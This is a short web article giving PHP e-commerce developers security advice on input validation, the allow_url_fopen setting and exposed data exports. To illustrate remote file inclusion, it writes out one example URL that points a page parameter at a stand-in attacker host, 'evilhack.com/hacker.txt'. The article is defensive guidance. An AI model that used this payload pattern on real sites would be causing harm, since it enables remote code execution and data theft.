Home | Internet | E-commerce
Security in an e-commerce website needs to be a major consideration when developing an e-commerce website or software. A developer needs to be aware of all the security considerations when designing a site. With e-commerce becoming more commonplace these days, the number of security attacks is certainly increasing. Paranoia is a healthy thing for e-commerce site developers, we need to keep up to gate with security issues, and keep our ears and eyes open. Though the following loopholes are serious, the following loopholes if present are easily fixed. Listed below are some security considerations to be included when developing a site. This article does not cover e-shoplifting, please see my separate article on this. User input – every input, whether it be entering a quantity, searching for a product, entering a name etc, needs to be validated for suspicious characters. If this is not done, it is possible to enter “?>”, the closing end tags of PHP and execute some PHP code. It is far safer allow numbers and characters a-z (capitals included) & 0-9 and nothing else, rather than make a list of all the character that shouldn’t be there. The validation script needs to scroll through each character one by one. This needs to be achieved using in server side validation, not Javascript. Using server side input validation is essential to keep out unwanted characters There exists another major when executing PHP code. When using PHP there is a setting called allow_url_fopen which enables the opening of files from a PHP script. This setting should be turned off, unless absolutely necessary. Just imagine you have PHP scripts for both fixed headers and footers, and to access your webpages you would type in http://www.mysite.com/index.php?page=page2. All it takes is a malicious user to run a script by modifying these parameters by typing in “http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt” with some PHP code in the file “hacker.txt”. You could have anything happen, PHP files read, deleted, vital information stolen. If you are not sure if this setting is on or off, please copy the following PHP code into a text file, and upload it to your web server: <?php phpinfo(); ?> When you access your script on your webserver, you should come across the setting allow_url_fopen under configuration. A computer user, under normal circumstances cannot find the value of this setting. Be careful of exported data like orders, products in CSV & mySQL files. If this data is exported from a script and is kept on the web server under a common file name ie. http://www.mysite.com/admin/output_tables.csv. This is only really a problem when the exported data resides in a file in a directory that is publicly accessible. There is two ways to prevent this security loophole – First have the output file behind a password protected directory, secondly have the data located inside a HTML textarea form element on a script. The storeowner can then copy this information from the textfile and create a new file on their computer and paste the information here. All it takes is a hacker to find this filename by checking out the e-commerce software’s demo website and look for the same filename on a real site.
Article Source: http://modirac.com
Paul Roberts
I run a software development company specialising in E-Commerce, Search Engine Optimization, and Print Estimation software called ROBO Design Solutions. I also develop New Zealand E-Commerce Solutions and Software under the name ROBO Design.
Please Rate this Article
5 out of 54 out of 53 out of 52 out of 51 out of 5
Not yet Rated
